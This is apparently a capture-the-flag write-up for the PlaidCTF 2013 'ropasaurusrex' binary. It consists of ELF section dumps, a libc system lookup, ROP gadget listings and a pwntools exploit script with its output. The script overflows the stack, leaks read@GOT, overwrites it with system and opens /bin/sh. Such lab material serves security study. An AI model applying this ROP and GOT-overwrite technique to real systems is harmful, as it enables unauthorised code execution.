         filesz 0x000000e0 memsz 0x000000e0 flags r-x
  INTERP off    0x00000114 vaddr 0x08048114 paddr 0x08048114 align 2**0
         filesz 0x00000013 memsz 0x00000013 flags r--
    LOAD off    0x00000000 vaddr 0x08048000 paddr 0x08048000 align 2**12
         filesz 0x0000051c memsz 0x0000051c flags r-x
    LOAD off    0x0000051c vaddr 0x0804951c paddr 0x0804951c align 2**12
         filesz 0x0000010c memsz 0x00000114 flags rw-
 DYNAMIC off    0x00000530 vaddr 0x08049530 paddr 0x08049530 align 2**2
         filesz 0x000000d0 memsz 0x000000d0 flags rw-
    NOTE off    0x00000128 vaddr 0x08048128 paddr 0x08048128 align 2**2
         filesz 0x00000044 memsz 0x00000044 flags r--
   STACK off    0x00000000 vaddr 0x00000000 paddr 0x00000000 align 2**2
         filesz 0x00000000 memsz 0x00000000 flags rw-

Dynamic Section:
  NEEDED               libc.so.6
  INIT                 0x080482bc
  FINI                 0x080484ec
  HASH                 0x0804816c
  GNU_HASH             0x08048198
  STRTAB               0x08048218
  SYMTAB               0x080481b8
  STRSZ                0x00000050
  SYMENT               0x00000010
  DEBUG                0x00000000
  PLTGOT               0x08049604
  PLTRELSZ             0x00000020
  PLTREL               0x00000011
  JMPREL               0x0804829c
  REL                  0x08048294
  RELSZ                0x00000008
  RELENT               0x00000008
  VERNEED              0x08048274
  VERNEEDNUM           0x00000001
  VERSYM               0x08048268

Version References:
  required from libc.so.6:
    0x0d696910 0x00 02 GLIBC_2.0

Sections:
Idx Name          Size      VMA       LMA       File off  Algn
  0 .interp       00000013  08048114  08048114  00000114  2**0
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  1 .note.ABI-tag 00000020  08048128  08048128  00000128  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  2 .note.gnu.build-id 00000024  08048148  08048148  00000148  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  3 .hash         0000002c  0804816c  0804816c  0000016c  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  4 .gnu.hash     00000020  08048198  08048198  00000198  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  5 .dynsym       00000060  080481b8  080481b8  000001b8  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  6 .dynstr       00000050  08048218  08048218  00000218  2**0
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  7 .gnu.version  0000000c  08048268  08048268  00000268  2**1
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  8 .gnu.version_r 00000020  08048274  08048274  00000274  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  9 .rel.dyn      00000008  08048294  08048294  00000294  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
 10 .rel.plt      00000020  0804829c  0804829c  0000029c  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
 11 .init         00000030  080482bc  080482bc  000002bc  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 12 .plt          00000050  080482ec  080482ec  000002ec  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 13 .text         000001ac  08048340  08048340  00000340  2**4
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 14 .fini         0000001c  080484ec  080484ec  000004ec  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, CODE
 15 .rodata       0000000d  08048508  08048508  00000508  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
 16 .eh_frame     00000004  08048518  08048518  00000518  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
 17 .ctors        00000008  0804951c  0804951c  0000051c  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 18 .dtors        00000008  08049524  08049524  00000524  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 19 .jcr          00000004  0804952c  0804952c  0000052c  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 20 .dynamic      000000d0  08049530  08049530  00000530  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 21 .got          00000004  08049600  08049600  00000600  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 22 .got.plt      0000001c  08049604  08049604  00000604  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 23 .data         00000008  08049620  08049620  00000620  2**2
                  CONTENTS, ALLOC, LOAD, DATA
 24 .bss          00000008  08049628  08049628  00000628  2**2
                  ALLOC
 25 .comment      0000001c  00000000  00000000  00000628  2**0
                  CONTENTS, READONLY
SYMBOL TABLE:
no symbols 

babyhack@ubuntu:/tmp/pwnable/pctf2013/ropasaurusrex$ objdump -x vul | grep -A1 '\.data'
 23 .data         00000008  08049620  08049620  00000620  2**2
                    CONTENTS,  ALLOC,      LOAD,       DATA
babyhack@ubuntu:/tmp/pwnable/pctf2013/ropasaurusrex$  

babyhack@ubuntu:/tmp/pwnable/pctf2013/ropasaurusrex$ objdump -x vul | grep -A1 '\.dynamic'
 20 .dynamic      000000d0  08049530  08049530  00000530  2**2
                  CONTENTS, ALLOC, LOAD, DATA
babyhack@ubuntu:/tmp/pwnable/pctf2013/ropasaurusrex$  

objdump -R vul

vul:     file format elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE
08049600 R_386_GLOB_DAT    __gmon_start__
08049610 R_386_JUMP_SLOT   __gmon_start__
08049614 R_386_JUMP_SLOT   write
08049618 R_386_JUMP_SLOT   __libc_start_main
0804961c R_386_JUMP_SLOT   read 

objdump -T /lib/i686/cmov/libc.so.6 | grep system
000f5470 g    DF .text 00000042  GLIBC_2.0   svcerr_systemerr
00039450 g    DF .text 0000007d  GLIBC_PRIVATE __libc_system
00039450  w   DF .text 0000007d  GLIBC_2.0   system 

 ./rp++ -f ./vul -r 4 | grep "pop"
0x080483c1: add al, 0x5B ; pop ebp ; ret  ;  (1 found)
0x080484e6: add al, 0x5B ; pop ebp ; ret  ;  (1 found)
0x080482e6: add byte [eax], al ; pop eax ; pop ebx ; leave  ; ret  ;  (1 found)
0x080484de: add eax, dword [ebx-0x0B8A0008] ; add esp, 0x04 ; pop ebx ; pop ebp ; ret  ;  (1 found)
0x080483bf: add esp, 0x04 ; pop ebx ; pop ebp ; ret  ;  (1 found)
0x080484e4: add esp, 0x04 ; pop ebx ; pop ebp ; ret  ;  (1 found)
0x080484b1: fiadd word [ebx+0x5E5B1CC4] ; pop edi ; pop ebp ; ret  ;  (1 found)
0x080484e3: hlt  ; add esp, 0x04 ; pop ebx ; pop ebp ; ret  ;  (1 found)
0x080483c0: les eax,  [ebx+ebx*2] ; pop ebp ; ret  ;  (1 found)
0x080484e5: les eax,  [ebx+ebx*2] ; pop ebp ; ret  ;  (1 found)
0x080484b3: les ebx,  [ebx+ebx*2] ; pop esi ; pop edi ; pop ebp ; ret  ;  (1 found)
0x080483b8: mov byte [0x08049628], 0x00000001 ; add esp, 0x04 ; pop ebx ; pop ebp ; ret  ;  (1 found)
0x08048451: mov ebp, esp ; pop ebp ; ret  ;  (1 found)
0x0804844f: nop  ; push ebp ; mov ebp, esp ; pop ebp ; ret  ;  (1 found)
0x080483bd: or byte [ecx], al ; add esp, 0x04 ; pop ebx ; pop ebp ; ret  ;  (1 found)
0x080482e8: pop eax ; pop ebx ; leave  ; ret  ;  (1 found)
0x080483c3: pop ebp ; ret  ;  (1 found)
0x08048453: pop ebp ; ret  ;  (1 found)
0x080484b8: pop ebp ; ret  ;  (1 found)
0x080484e8: pop ebp ; ret  ;  (1 found)
0x080482e9: pop ebx ; leave  ; ret  ;  (1 found)
0x08048505: pop ebx ; leave  ; ret  ;  (1 found)
0x080483c2: pop ebx ; pop ebp ; ret  ;  (1 found)
0x080484e7: pop ebx ; pop ebp ; ret  ;  (1 found)
0x080484b5: pop ebx ; pop esi ; pop edi ; pop ebp ; ret  ;  (1 found)
0x08048504: pop ecx ; pop ebx ; leave  ; ret  ;  (1 found)
0x080484b7: pop edi ; pop ebp ; ret  ;  (1 found)
0x080484b6: pop esi ; pop edi ; pop ebp ; ret  ;  (1 found)
0x080484e1: push dword [ebp-0x0C] ; add esp, 0x04 ; pop ebx ; pop ebp ; ret  ;  (1 found)
0x08048450: push ebp ; mov ebp, esp ; pop ebp ; ret  ;  (1 found)
0x080484b4: sbb al, 0x5B ; pop esi ; pop edi ; pop ebp ; ret  ;  (1 found)
0x080483ba: sub byte [esi-0x7CFEF7FC], dl ; les eax,  [ebx+ebx*2] ; pop ebp ; ret  ;  (1 found)

from pwn import *
from struct import *

binsh = "/bin/sh"
# up= lambda x:struct.unpack("<L",x) # L  unsigned long   integer   4   (3)
# little endian format exchange unsgined long type to binary string
up32 = lambda x:struct.unpack('<L',x)[0]

binary = ELF("vul")
libc = ELF("/lib/i386-linux-gnu/libc.so.6")
rop = ROP(binary)

print binary.checksec()

read_plt = binary.plt['read']
read_got = binary.got['read']
write_plt = binary.plt['write']
write_got = binary.got['write']

read_system_offset = libc.symbols['read'] - libc.symbols['system']
dynamic_section = 0x08049530

log.info("read@plt : " + str(hex(read_plt)))
log.info("read@got : " + str(hex(read_got)))
log.info("write@plt : " + str(hex(write_plt)))
log.info("write@got : " + str(hex(write_got)))
log.info("read system offset : " + str(hex(read_system_offset)))
log.info("Dynamic section : " + str(hex(dynamic_section)))

rop.read(0,dynamic_section,len(str(binsh)))    # 1
rop.write(1,read_got,len(str(read_got)))         # 2
rop.read(0,read_got,len(str(read_got)))         # 3
rop.raw(read_plt)                                    # 4  system 함수 호출
rop.raw(0xaaaabbbb)                              # 5   dummy
rop.raw(dynamic_section)                         # 6  "/bin/sh" 입력

payload = "A"*140 + str(rop)
print payload

#r = remote("127.0.0.1", 1234)
r = process('./vul')

r.send(payload) # overflow # 0
r.recvn(4,timeout=1)

r.send(binsh) # 1 code 실행
read = up32(r.recvn(4,timeout=1)) # 2 code 실행  / read_got 주소를 recv

log.info('read address : [%s]' % str(hex(read)))

system_addr = read - read_system_offset  # 시스템 함수 주소 계산

log.info('system_addr : [%s]' % str(hex(system_addr)))

rop = ROP(binary)
rop.raw(system_addr)

r.send(str(rop)) # 3 code 실행 / system 함수를 write
r.interactive()

'''
[*] Loaded cached gadgets for 'vul' @ 0x8048000
RELRO:         No RELRO
Stack Canary:  No canary found
NX:            NX enabled
PIE:           No PIE
RPATH:         No RPATH
RUNPATH:       No RUNPATH
[*] read@plt : 0x804832c
[*] read@got : 0x804961c
[*] write@plt : 0x804830c
[*] write@got : 0x8049614
[*] read system offset : 0x9e5b0
[*] Dynamic section : 0x8049530
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,\x83\x0\xbf\x83\x0\x00\x00\x00\x000\x95\x0\x07\x00\x00\x00\x0c\x83\x0\xbf\x83\x0\x00\x00\x00\x1c\x96\x0    \x00\x00\x00,\x83\x0\xbf\x83\x0\x00\x00\x00\x00\x1c\x96\x0    \x00\x00\x00,\x83\x0\xbb\xbb\xaa\xaa0\x95\x0
[+] Started program './vul'
[*]
[*] read address : [0xb75f2710]
[*] system_addr : [0xb7554160]
----> 0x0000:       0xb7554160
[*] Switching to interactive mode
'''